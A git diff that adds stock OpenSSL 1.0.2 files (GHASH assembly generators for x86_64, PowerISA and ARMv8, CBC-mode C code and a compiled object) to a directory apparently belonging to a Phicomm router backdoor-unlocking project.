+$code.=<<___	if ($avx);
+	.rva	.LSEH_begin_gcm_init_avx
+	.rva	.LSEH_end_gcm_init_avx
+	.rva	.LSEH_info_gcm_init_clmul
+
+	.rva	.LSEH_begin_gcm_ghash_avx
+	.rva	.LSEH_end_gcm_ghash_avx
+	.rva	.LSEH_info_gcm_ghash_clmul
+___
+$code.=<<___;
+.section	.xdata
+.align	8
+.LSEH_info_gcm_gmult_4bit:
+	.byte	9,0,0,0
+	.rva	se_handler
+	.rva	.Lgmult_prologue,.Lgmult_epilogue	# HandlerData
+.LSEH_info_gcm_ghash_4bit:
+	.byte	9,0,0,0
+	.rva	se_handler
+	.rva	.Lghash_prologue,.Lghash_epilogue	# HandlerData
+.LSEH_info_gcm_init_clmul:
+	.byte	0x01,0x08,0x03,0x00
+	.byte	0x08,0x68,0x00,0x00	#movaps	0x00(rsp),xmm6
+	.byte	0x04,0x22,0x00,0x00	#sub	rsp,0x18
+.LSEH_info_gcm_ghash_clmul:
+	.byte	0x01,0x33,0x16,0x00
+	.byte	0x33,0xf8,0x09,0x00	#movaps 0x90(rsp),xmm15
+	.byte	0x2e,0xe8,0x08,0x00	#movaps 0x80(rsp),xmm14
+	.byte	0x29,0xd8,0x07,0x00	#movaps 0x70(rsp),xmm13
+	.byte	0x24,0xc8,0x06,0x00	#movaps 0x60(rsp),xmm12
+	.byte	0x1f,0xb8,0x05,0x00	#movaps 0x50(rsp),xmm11
+	.byte	0x1a,0xa8,0x04,0x00	#movaps 0x40(rsp),xmm10
+	.byte	0x15,0x98,0x03,0x00	#movaps 0x30(rsp),xmm9
+	.byte	0x10,0x88,0x02,0x00	#movaps 0x20(rsp),xmm8
+	.byte	0x0c,0x78,0x01,0x00	#movaps 0x10(rsp),xmm7
+	.byte	0x08,0x68,0x00,0x00	#movaps 0x00(rsp),xmm6
+	.byte	0x04,0x01,0x15,0x00	#sub	rsp,0xa8
+___
+}
+
+$code =~ s/\`([^\`]*)\`/eval($1)/gem;
+
+print $code;
+
+close STDOUT;
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/modes/asm/ghashp8-ppc.pl b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/modes/asm/ghashp8-ppc.pl
new file mode 100755
index 0000000..e76a58c
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/modes/asm/ghashp8-ppc.pl
@@ -0,0 +1,234 @@
+#!/usr/bin/env perl
+#
+# ====================================================================
+# Written by Andy Polyakov <appro@openssl.org> for the OpenSSL
+# project. The module is, however, dual licensed under OpenSSL and
+# CRYPTOGAMS licenses depending on where you obtain it. For further
+# details see http://www.openssl.org/~appro/cryptogams/.
+# ====================================================================
+#
+# GHASH for for PowerISA v2.07.
+#
+# July 2014
+#
+# Accurate performance measurements are problematic, because it's
+# always virtualized setup with possibly throttled processor.
+# Relative comparison is therefore more informative. This initial
+# version is ~2.1x slower than hardware-assisted AES-128-CTR, ~12x
+# faster than "4-bit" integer-only compiler-generated 64-bit code.
+# "Initial version" means that there is room for futher improvement.
+
+$flavour=shift;
+$output =shift;
+
+if ($flavour =~ /64/) {
+	$SIZE_T=8;
+	$LRSAVE=2*$SIZE_T;
+	$STU="stdu";
+	$POP="ld";
+	$PUSH="std";
+} elsif ($flavour =~ /32/) {
+	$SIZE_T=4;
+	$LRSAVE=$SIZE_T;
+	$STU="stwu";
+	$POP="lwz";
+	$PUSH="stw";
+} else { die "nonsense $flavour"; }
+
+$0 =~ m/(.*[\/\\])[^\/\\]+$/; $dir=$1;
+( $xlate="${dir}ppc-xlate.pl" and -f $xlate ) or
+( $xlate="${dir}../../perlasm/ppc-xlate.pl" and -f $xlate) or
+die "can't locate ppc-xlate.pl";
+
+open STDOUT,"| $^X $xlate $flavour $output" || die "can't call $xlate: $!";
+
+my ($Xip,$Htbl,$inp,$len)=map("r$_",(3..6));	# argument block
+
+my ($Xl,$Xm,$Xh,$IN)=map("v$_",(0..3));
+my ($zero,$t0,$t1,$t2,$xC2,$H,$Hh,$Hl,$lemask)=map("v$_",(4..12));
+my $vrsave="r12";
+
+$code=<<___;
+.machine	"any"
+
+.text
+
+.globl	.gcm_init_p8
+.align	5
+.gcm_init_p8:
+	lis		r0,0xfff0
+	li		r8,0x10
+	mfspr		$vrsave,256
+	li		r9,0x20
+	mtspr		256,r0
+	li		r10,0x30
+	lvx_u		$H,0,r4			# load H
+
+	vspltisb	$xC2,-16		# 0xf0
+	vspltisb	$t0,1			# one
+	vaddubm		$xC2,$xC2,$xC2		# 0xe0
+	vxor		$zero,$zero,$zero
+	vor		$xC2,$xC2,$t0		# 0xe1
+	vsldoi		$xC2,$xC2,$zero,15	# 0xe1...
+	vsldoi		$t1,$zero,$t0,1		# ...1
+	vaddubm		$xC2,$xC2,$xC2		# 0xc2...
+	vspltisb	$t2,7
+	vor		$xC2,$xC2,$t1		# 0xc2....01
+	vspltb		$t1,$H,0		# most significant byte
+	vsl		$H,$H,$t0		# H<<=1
+	vsrab		$t1,$t1,$t2		# broadcast carry bit
+	vand		$t1,$t1,$xC2
+	vxor		$H,$H,$t1		# twisted H
+
+	vsldoi		$H,$H,$H,8		# twist even more ...
+	vsldoi		$xC2,$zero,$xC2,8	# 0xc2.0
+	vsldoi		$Hl,$zero,$H,8		# ... and split
+	vsldoi		$Hh,$H,$zero,8
+
+	stvx_u		$xC2,0,r3		# save pre-computed table
+	stvx_u		$Hl,r8,r3
+	stvx_u		$H, r9,r3
+	stvx_u		$Hh,r10,r3
+
+	mtspr		256,$vrsave
+	blr
+	.long		0
+	.byte		0,12,0x14,0,0,0,2,0
+	.long		0
+.size	.gcm_init_p8,.-.gcm_init_p8
+
+.globl	.gcm_gmult_p8
+.align	5
+.gcm_gmult_p8:
+	lis		r0,0xfff8
+	li		r8,0x10
+	mfspr		$vrsave,256
+	li		r9,0x20
+	mtspr		256,r0
+	li		r10,0x30
+	lvx_u		$IN,0,$Xip		# load Xi
+
+	lvx_u		$Hl,r8,$Htbl		# load pre-computed table
+	 le?lvsl	$lemask,r0,r0
+	lvx_u		$H, r9,$Htbl
+	 le?vspltisb	$t0,0x07
+	lvx_u		$Hh,r10,$Htbl
+	 le?vxor	$lemask,$lemask,$t0
+	lvx_u		$xC2,0,$Htbl
+	 le?vperm	$IN,$IN,$IN,$lemask
+	vxor		$zero,$zero,$zero
+
+	vpmsumd		$Xl,$IN,$Hl		# H.lo·Xi.lo
+	vpmsumd		$Xm,$IN,$H		# H.hi·Xi.lo+H.lo·Xi.hi
+	vpmsumd		$Xh,$IN,$Hh		# H.hi·Xi.hi
+
+	vpmsumd		$t2,$Xl,$xC2		# 1st phase
+
+	vsldoi		$t0,$Xm,$zero,8
+	vsldoi		$t1,$zero,$Xm,8
+	vxor		$Xl,$Xl,$t0
+	vxor		$Xh,$Xh,$t1
+
+	vsldoi		$Xl,$Xl,$Xl,8
+	vxor		$Xl,$Xl,$t2
+
+	vsldoi		$t1,$Xl,$Xl,8		# 2nd phase
+	vpmsumd		$Xl,$Xl,$xC2
+	vxor		$t1,$t1,$Xh
+	vxor		$Xl,$Xl,$t1
+
+	le?vperm	$Xl,$Xl,$Xl,$lemask
+	stvx_u		$Xl,0,$Xip		# write out Xi
+
+	mtspr		256,$vrsave
+	blr
+	.long		0
+	.byte		0,12,0x14,0,0,0,2,0
+	.long		0
+.size	.gcm_gmult_p8,.-.gcm_gmult_p8
+
+.globl	.gcm_ghash_p8
+.align	5
+.gcm_ghash_p8:
+	lis		r0,0xfff8
+	li		r8,0x10
+	mfspr		$vrsave,256
+	li		r9,0x20
+	mtspr		256,r0
+	li		r10,0x30
+	lvx_u		$Xl,0,$Xip		# load Xi
+
+	lvx_u		$Hl,r8,$Htbl		# load pre-computed table
+	 le?lvsl	$lemask,r0,r0
+	lvx_u		$H, r9,$Htbl
+	 le?vspltisb	$t0,0x07
+	lvx_u		$Hh,r10,$Htbl
+	 le?vxor	$lemask,$lemask,$t0
+	lvx_u		$xC2,0,$Htbl
+	 le?vperm	$Xl,$Xl,$Xl,$lemask
+	vxor		$zero,$zero,$zero
+
+	lvx_u		$IN,0,$inp
+	addi		$inp,$inp,16
+	subi		$len,$len,16
+	 le?vperm	$IN,$IN,$IN,$lemask
+	vxor		$IN,$IN,$Xl
+	b		Loop
+
+.align	5
+Loop:
+	 subic		$len,$len,16
+	vpmsumd		$Xl,$IN,$Hl		# H.lo·Xi.lo
+	 subfe.		r0,r0,r0		# borrow?-1:0
+	vpmsumd		$Xm,$IN,$H		# H.hi·Xi.lo+H.lo·Xi.hi
+	 and		r0,r0,$len
+	vpmsumd		$Xh,$IN,$Hh		# H.hi·Xi.hi
+	 add		$inp,$inp,r0
+
+	vpmsumd		$t2,$Xl,$xC2		# 1st phase
+
+	vsldoi		$t0,$Xm,$zero,8
+	vsldoi		$t1,$zero,$Xm,8
+	vxor		$Xl,$Xl,$t0
+	vxor		$Xh,$Xh,$t1
+
+	vsldoi		$Xl,$Xl,$Xl,8
+	vxor		$Xl,$Xl,$t2
+	 lvx_u		$IN,0,$inp
+	 addi		$inp,$inp,16
+
+	vsldoi		$t1,$Xl,$Xl,8		# 2nd phase
+	vpmsumd		$Xl,$Xl,$xC2
+	 le?vperm	$IN,$IN,$IN,$lemask
+	vxor		$t1,$t1,$Xh
+	vxor		$IN,$IN,$t1
+	vxor		$IN,$IN,$Xl
+	beq		Loop			# did $len-=16 borrow?
+
+	vxor		$Xl,$Xl,$t1
+	le?vperm	$Xl,$Xl,$Xl,$lemask
+	stvx_u		$Xl,0,$Xip		# write out Xi
+
+	mtspr		256,$vrsave
+	blr
+	.long		0
+	.byte		0,12,0x14,0,0,0,4,0
+	.long		0
+.size	.gcm_ghash_p8,.-.gcm_ghash_p8
+
+.asciz  "GHASH for PowerISA 2.07, CRYPTOGAMS by <appro\@openssl.org>"
+.align  2
+___
+
+foreach (split("\n",$code)) {
+	if ($flavour =~ /le$/o) {	# little-endian
+	    s/le\?//o		or
+	    s/be\?/#be#/o;
+	} else {
+	    s/le\?/#le#/o	or
+	    s/be\?//o;
+	}
+	print $_,"\n";
+}
+
+close STDOUT; # enforce flush
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/modes/asm/ghashv8-armx.pl b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/modes/asm/ghashv8-armx.pl
new file mode 100644
index 0000000..54a1ac4
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/modes/asm/ghashv8-armx.pl
@@ -0,0 +1,241 @@
+#!/usr/bin/env perl
+#
+# ====================================================================
+# Written by Andy Polyakov <appro@openssl.org> for the OpenSSL
+# project. The module is, however, dual licensed under OpenSSL and
+# CRYPTOGAMS licenses depending on where you obtain it. For further
+# details see http://www.openssl.org/~appro/cryptogams/.
+# ====================================================================
+#
+# GHASH for ARMv8 Crypto Extension, 64-bit polynomial multiplication.
+#
+# June 2014
+#
+# Initial version was developed in tight cooperation with Ard
+# Biesheuvel <ard.biesheuvel@linaro.org> from bits-n-pieces from
+# other assembly modules. Just like aesv8-armx.pl this module
+# supports both AArch32 and AArch64 execution modes.
+#
+# Current performance in cycles per processed byte:
+#
+#		PMULL[2]	32-bit NEON(*)
+# Apple A7	1.76		5.62
+# Cortex-A53	1.45		8.39
+# Cortex-A57	2.22		7.61
+#
+# (*)	presented for reference/comparison purposes;
+
+$flavour = shift;
+open STDOUT,">".shift;
+
+$Xi="x0";	# argument block
+$Htbl="x1";
+$inp="x2";
+$len="x3";
+
+$inc="x12";
+
+{
+my ($Xl,$Xm,$Xh,$IN)=map("q$_",(0..3));
+my ($t0,$t1,$t2,$t3,$H,$Hhl)=map("q$_",(8..14));
+
+$code=<<___;
+#include "arm_arch.h"
+
+.text
+___
+$code.=".arch	armv8-a+crypto\n"	if ($flavour =~ /64/);
+$code.=".fpu	neon\n.code	32\n"	if ($flavour !~ /64/);
+
+$code.=<<___;
+.global	gcm_init_v8
+.type	gcm_init_v8,%function
+.align	4
+gcm_init_v8:
+	vld1.64		{$t1},[x1]		@ load H
+	vmov.i8		$t0,#0xe1
+	vext.8		$IN,$t1,$t1,#8
+	vshl.i64	$t0,$t0,#57
+	vshr.u64	$t2,$t0,#63
+	vext.8		$t0,$t2,$t0,#8		@ t0=0xc2....01
+	vdup.32		$t1,${t1}[1]
+	vshr.u64	$t3,$IN,#63
+	vshr.s32	$t1,$t1,#31		@ broadcast carry bit
+	vand		$t3,$t3,$t0
+	vshl.i64	$IN,$IN,#1
+	vext.8		$t3,$t3,$t3,#8
+	vand		$t0,$t0,$t1
+	vorr		$IN,$IN,$t3		@ H<<<=1
+	veor		$IN,$IN,$t0		@ twisted H
+	vst1.64		{$IN},[x0]
+
+	ret
+.size	gcm_init_v8,.-gcm_init_v8
+
+.global	gcm_gmult_v8
+.type	gcm_gmult_v8,%function
+.align	4
+gcm_gmult_v8:
+	vld1.64		{$t1},[$Xi]		@ load Xi
+	vmov.i8		$t3,#0xe1
+	vld1.64		{$H},[$Htbl]		@ load twisted H
+	vshl.u64	$t3,$t3,#57
+#ifndef __ARMEB__
+	vrev64.8	$t1,$t1
+#endif
+	vext.8		$Hhl,$H,$H,#8
+	mov		$len,#0
+	vext.8		$IN,$t1,$t1,#8
+	mov		$inc,#0
+	veor		$Hhl,$Hhl,$H		@ Karatsuba pre-processing
+	mov		$inp,$Xi
+	b		.Lgmult_v8
+.size	gcm_gmult_v8,.-gcm_gmult_v8
+
+.global	gcm_ghash_v8
+.type	gcm_ghash_v8,%function
+.align	4
+gcm_ghash_v8:
+	vld1.64		{$Xl},[$Xi]		@ load [rotated] Xi
+	subs		$len,$len,#16
+	vmov.i8		$t3,#0xe1
+	mov		$inc,#16
+	vld1.64		{$H},[$Htbl]		@ load twisted H
+	cclr		$inc,eq
+	vext.8		$Xl,$Xl,$Xl,#8
+	vshl.u64	$t3,$t3,#57
+	vld1.64		{$t1},[$inp],$inc	@ load [rotated] inp
+	vext.8		$Hhl,$H,$H,#8
+#ifndef __ARMEB__
+	vrev64.8	$Xl,$Xl
+	vrev64.8	$t1,$t1
+#endif
+	veor		$Hhl,$Hhl,$H		@ Karatsuba pre-processing
+	vext.8		$IN,$t1,$t1,#8
+	b		.Loop_v8
+
+.align	4
+.Loop_v8:
+	vext.8		$t2,$Xl,$Xl,#8
+	veor		$IN,$IN,$Xl		@ inp^=Xi
+	veor		$t1,$t1,$t2		@ $t1 is rotated inp^Xi
+
+.Lgmult_v8:
+	vpmull.p64	$Xl,$H,$IN		@ H.lo·Xi.lo
+	veor		$t1,$t1,$IN		@ Karatsuba pre-processing
+	vpmull2.p64	$Xh,$H,$IN		@ H.hi·Xi.hi
+	subs		$len,$len,#16
+	vpmull.p64	$Xm,$Hhl,$t1		@ (H.lo+H.hi)·(Xi.lo+Xi.hi)
+	cclr		$inc,eq
+
+	vext.8		$t1,$Xl,$Xh,#8		@ Karatsuba post-processing
+	veor		$t2,$Xl,$Xh
+	veor		$Xm,$Xm,$t1
+	 vld1.64	{$t1},[$inp],$inc	@ load [rotated] inp
+	veor		$Xm,$Xm,$t2
+	vpmull.p64	$t2,$Xl,$t3		@ 1st phase
+
+	vmov		$Xh#lo,$Xm#hi		@ Xh|Xm - 256-bit result
+	vmov		$Xm#hi,$Xl#lo		@ Xm is rotated Xl
+#ifndef __ARMEB__
+	 vrev64.8	$t1,$t1
+#endif
+	veor		$Xl,$Xm,$t2
+	 vext.8		$IN,$t1,$t1,#8
+
+	vext.8		$t2,$Xl,$Xl,#8		@ 2nd phase
+	vpmull.p64	$Xl,$Xl,$t3
+	veor		$t2,$t2,$Xh
+	veor		$Xl,$Xl,$t2
+	b.hs		.Loop_v8
+
+#ifndef __ARMEB__
+	vrev64.8	$Xl,$Xl
+#endif
+	vext.8		$Xl,$Xl,$Xl,#8
+	vst1.64		{$Xl},[$Xi]		@ write out Xi
+
+	ret
+.size	gcm_ghash_v8,.-gcm_ghash_v8
+___
+}
+$code.=<<___;
+.asciz  "GHASH for ARMv8, CRYPTOGAMS by <appro\@openssl.org>"
+.align  2
+___
+
+if ($flavour =~ /64/) {			######## 64-bit code
+    sub unvmov {
+	my $arg=shift;
+
+	$arg =~ m/q([0-9]+)#(lo|hi),\s*q([0-9]+)#(lo|hi)/o &&
+	sprintf	"ins	v%d.d[%d],v%d.d[%d]",$1,($2 eq "lo")?0:1,$3,($4 eq "lo")?0:1;
+    }
+    foreach(split("\n",$code)) {
+	s/cclr\s+([wx])([^,]+),\s*([a-z]+)/csel	$1$2,$1zr,$1$2,$3/o	or
+	s/vmov\.i8/movi/o		or	# fix up legacy mnemonics
+	s/vmov\s+(.*)/unvmov($1)/geo	or
+	s/vext\.8/ext/o			or
+	s/vshr\.s/sshr\.s/o		or
+	s/vshr/ushr/o			or
+	s/^(\s+)v/$1/o			or	# strip off v prefix
+	s/\bbx\s+lr\b/ret/o;
+
+	s/\bq([0-9]+)\b/"v".($1<8?$1:$1+8).".16b"/geo;	# old->new registers
+	s/@\s/\/\//o;				# old->new style commentary
+
+	# fix up remainig legacy suffixes
+	s/\.[ui]?8(\s)/$1/o;
+	s/\.[uis]?32//o and s/\.16b/\.4s/go;
+	m/\.p64/o and s/\.16b/\.1q/o;		# 1st pmull argument
+	m/l\.p64/o and s/\.16b/\.1d/go;		# 2nd and 3rd pmull arguments
+	s/\.[uisp]?64//o and s/\.16b/\.2d/go;
+	s/\.[42]([sd])\[([0-3])\]/\.$1\[$2\]/o;
+
+	print $_,"\n";
+    }
+} else {				######## 32-bit code
+    sub unvdup32 {
+	my $arg=shift;
+
+	$arg =~ m/q([0-9]+),\s*q([0-9]+)\[([0-3])\]/o &&
+	sprintf	"vdup.32	q%d,d%d[%d]",$1,2*$2+($3>>1),$3&1;
+    }
+    sub unvpmullp64 {
+	my ($mnemonic,$arg)=@_;
+
+	if ($arg =~ m/q([0-9]+),\s*q([0-9]+),\s*q([0-9]+)/o) {
+	    my $word = 0xf2a00e00|(($1&7)<<13)|(($1&8)<<19)
+				 |(($2&7)<<17)|(($2&8)<<4)
+				 |(($3&7)<<1) |(($3&8)<<2);
+	    $word |= 0x00010001	 if ($mnemonic =~ "2");
+	    # since ARMv7 instructions are always encoded little-endian.
+	    # correct solution is to use .inst directive, but older
+	    # assemblers don't implement it:-(
+	    sprintf ".byte\t0x%02x,0x%02x,0x%02x,0x%02x\t@ %s %s",
+			$word&0xff,($word>>8)&0xff,
+			($word>>16)&0xff,($word>>24)&0xff,
+			$mnemonic,$arg;
+	}
+    }
+
+    foreach(split("\n",$code)) {
+	s/\b[wx]([0-9]+)\b/r$1/go;		# new->old registers
+	s/\bv([0-9])\.[12468]+[bsd]\b/q$1/go;	# new->old registers
+        s/\/\/\s?/@ /o;				# new->old style commentary
+
+	# fix up remainig new-style suffixes
+	s/\],#[0-9]+/]!/o;
+
+	s/cclr\s+([^,]+),\s*([a-z]+)/mov$2	$1,#0/o			or
+	s/vdup\.32\s+(.*)/unvdup32($1)/geo				or
+	s/v?(pmull2?)\.p64\s+(.*)/unvpmullp64($1,$2)/geo		or
+	s/\bq([0-9]+)#(lo|hi)/sprintf "d%d",2*$1+($2 eq "hi")/geo	or
+	s/^(\s+)b\./$1b/o						or
+	s/^(\s+)ret/$1bx\tlr/o;
+
+        print $_,"\n";
+    }
+}
+
+close STDOUT; # enforce flush
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/modes/cbc128.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/modes/cbc128.c
new file mode 100644
index 0000000..c13caea
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/modes/cbc128.c
@@ -0,0 +1,207 @@
+/* ====================================================================
+ * Copyright (c) 2008 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@openssl.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ */
+
+#include <openssl/crypto.h>
+#include "modes_lcl.h"
+#include <string.h>
+
+#ifndef MODES_DEBUG
+# ifndef NDEBUG
+#  define NDEBUG
+# endif
+#endif
+#include <assert.h>
+
+#if !defined(STRICT_ALIGNMENT) && !defined(PEDANTIC)
+# define STRICT_ALIGNMENT 0
+#endif
+
+void CRYPTO_cbc128_encrypt(const unsigned char *in, unsigned char *out,
+                           size_t len, const void *key,
+                           unsigned char ivec[16], block128_f block)
+{
+    size_t n;
+    const unsigned char *iv = ivec;
+
+    assert(in && out && key && ivec);
+
+#if !defined(OPENSSL_SMALL_FOOTPRINT)
+    if (STRICT_ALIGNMENT &&
+        ((size_t)in | (size_t)out | (size_t)ivec) % sizeof(size_t) != 0) {
+        while (len >= 16) {
+            for (n = 0; n < 16; ++n)
+                out[n] = in[n] ^ iv[n];
+            (*block) (out, out, key);
+            iv = out;
+            len -= 16;
+            in += 16;
+            out += 16;
+        }
+    } else {
+        while (len >= 16) {
+            for (n = 0; n < 16; n += sizeof(size_t))
+                *(size_t *)(out + n) =
+                    *(size_t *)(in + n) ^ *(size_t *)(iv + n);
+            (*block) (out, out, key);
+            iv = out;
+            len -= 16;
+            in += 16;
+            out += 16;
+        }
+    }
+#endif
+    while (len) {
+        for (n = 0; n < 16 && n < len; ++n)
+            out[n] = in[n] ^ iv[n];
+        for (; n < 16; ++n)
+            out[n] = iv[n];
+        (*block) (out, out, key);
+        iv = out;
+        if (len <= 16)
+            break;
+        len -= 16;
+        in += 16;
+        out += 16;
+    }
+    memcpy(ivec, iv, 16);
+}
+
+void CRYPTO_cbc128_decrypt(const unsigned char *in, unsigned char *out,
+                           size_t len, const void *key,
+                           unsigned char ivec[16], block128_f block)
+{
+    size_t n;
+    union {
+        size_t t[16 / sizeof(size_t)];
+        unsigned char c[16];
+    } tmp;
+
+    assert(in && out && key && ivec);
+
+#if !defined(OPENSSL_SMALL_FOOTPRINT)
+    if (in != out) {
+        const unsigned char *iv = ivec;
+
+        if (STRICT_ALIGNMENT &&
+            ((size_t)in | (size_t)out | (size_t)ivec) % sizeof(size_t) != 0) {
+            while (len >= 16) {
+                (*block) (in, out, key);
+                for (n = 0; n < 16; ++n)
+                    out[n] ^= iv[n];
+                iv = in;
+                len -= 16;
+                in += 16;
+                out += 16;
+            }
+        } else if (16 % sizeof(size_t) == 0) { /* always true */
+            while (len >= 16) {
+                size_t *out_t = (size_t *)out, *iv_t = (size_t *)iv;
+
+                (*block) (in, out, key);
+                for (n = 0; n < 16 / sizeof(size_t); n++)
+                    out_t[n] ^= iv_t[n];
+                iv = in;
+                len -= 16;
+                in += 16;
+                out += 16;
+            }
+        }
+        memcpy(ivec, iv, 16);
+    } else {
+        if (STRICT_ALIGNMENT &&
+            ((size_t)in | (size_t)out | (size_t)ivec) % sizeof(size_t) != 0) {
+            unsigned char c;
+            while (len >= 16) {
+                (*block) (in, tmp.c, key);
+                for (n = 0; n < 16; ++n) {
+                    c = in[n];
+                    out[n] = tmp.c[n] ^ ivec[n];
+                    ivec[n] = c;
+                }
+                len -= 16;
+                in += 16;
+                out += 16;
+            }
+        } else if (16 % sizeof(size_t) == 0) { /* always true */
+            while (len >= 16) {
+                size_t c, *out_t = (size_t *)out, *ivec_t = (size_t *)ivec;
+                const size_t *in_t = (const size_t *)in;
+
+                (*block) (in, tmp.c, key);
+                for (n = 0; n < 16 / sizeof(size_t); n++) {
+                    c = in_t[n];
+                    out_t[n] = tmp.t[n] ^ ivec_t[n];
+                    ivec_t[n] = c;
+                }
+                len -= 16;
+                in += 16;
+                out += 16;
+            }
+        }
+    }
+#endif
+    while (len) {
+        unsigned char c;
+        (*block) (in, tmp.c, key);
+        for (n = 0; n < 16 && n < len; ++n) {
+            c = in[n];
+            out[n] = tmp.c[n] ^ ivec[n];
+            ivec[n] = c;
+        }
+        if (len <= 16) {
+            for (; n < 16; ++n)
+                ivec[n] = in[n];
+            break;
+        }
+        len -= 16;
+        in += 16;
+        out += 16;
+    }
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/modes/cbc128.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/modes/cbc128.o
new file mode 100644
index 0000000000000000000000000000000000000000..9c1cebbc12001bf57d2a7df250e63c9661db23fc
GIT binary patch
literal 2424
zcmbtU-EZ4e6u++1Hb8Jv6ro5%C=Ujuf|;bLN;*v_PMhW!dF$BHp@|ifrWr+DKa@IU
zMQBViOuY@|;|=ydAVAt5kixnlUM7$x#0$J2)OPD=RTWA>3+LL`s^^6lxRP_u`Q7vR
zyZ7duygt+>2*h0id4U{QE=owI<3P{aYL+}oLS!fW<i7ecEC(Lf=uMrjsHZi0PaV<d
zEwy-zUeoB_2+-YAKzG2plK?s>2ccfXpY9E?_QUf7T0H{kE*&>wK<@$_AzJ-J5a@4^
zekrI^U5+4z%D&qCPOsZu>w2BR)@nqv8j;(d>vTh>cT){m*$9C3>lRFYzoji7?E_&)
z7dFhE>{4%Mwx?IfF7}GhY(W24Z{Aso3X4(Ovi2giZOjk!C!jxL6`((cBZ3<43dmqx
zOT03wo>fQHS5@O{XV_!(rh1x<xNDDy^W6gaEsppXjtJvW4?LAXhS;nbY-&019Q6MI
zG$7Y-ls%*emQ6Xn{wew(VH*7%QK<LI(0v`Od*S(<&LExfaRX?P5rC|z%^v{AjsbFD
zQy77IN=x-YT?=Zd<H*>GW?e^CkdZHet|6H?1+1)bN*Y^8hbHVga|x^P-e&mS8>|P`
z4Ni_#u|}$~ewj6256OD>Hdud#=g;UA+ehZ@{7yrr-H=wlxW)RxrgS;3r9(1M>`j*w
ztPL%#^G-E-R7PK%661gZlJK@1ynV%K^T8fLSY1EcY&MrdqPi6AP<x^Qb+On^)WuN1
zKESo=FH2ETU5wf$J3+gT%s8YS^3C=&oPyx_f#>{4VPN1$JTWp>n>K6lekH9W52v25
z*=FiuPf|(tb~`W$U~~k(cKiy*M@SnX4Tg#Mu@!X$5#BmUgbNYjP^dHb5k8zj#Gl}M
zn@kQ#kq_H+DfWSwm*UHTyp(vqy&xqocMM7ytFs`z)^=6Os8Uju5;-ZJlVUk3l9Pfu
zhK}<*4fY`IJb9J}-FTismZ#w4xg>}m3#~HoB>y5<>Hyhpw%Qh3{u3|`To&$+5^dJ*
z$CxD&&!2~9TO^$x>p&Gr@WAkBqJ0`30M&=_d(6|P%{gLmj=Q$aA!2>_v2*n=#&;{6
zl*h`co{Ul^11Ha%C=MHrZB(Yq)rDEphmKbq)F|k~IaN1?hlWn&i$+n+>3M?~#++Fy
zPa5TkN#k7Ujq|LBD|oTkVs|Tq-`{xc*@~mi7Te}7wmo709^meLM44NdGD~A9&8j0O
zT&-F;UsBA<1(PV_C9_17vAH>-lxL=<D$|Hf&zKbj@AzT6J8r)|T~lVOGqaVdxj+;<
zLuJA^S1nCdcnAMa#4()RJ^#(fBF5Hd-l5TEzTR~R4aQm43!;9BJy={ZN7(m+#kx1j
z#h*ru;r^Sv>8s1rJW&5xp7X!Pr+EFOTYyWq{xd$@o!^y5c)ZVz#QY6$2RF|3e-Rb-
z`uyX%@p0FYOP4<v9z%uY^v7p-{V!ZcF8%SNh_^bwPx$${ys-DpV%>Q6{94s!rPg@;
n3?KLr#2#u9&#+ch#d&?!pLhBB>%z@e@!#-x`*C{`_~ZWpbc&ZJ

literal 0
HcmV?d00001

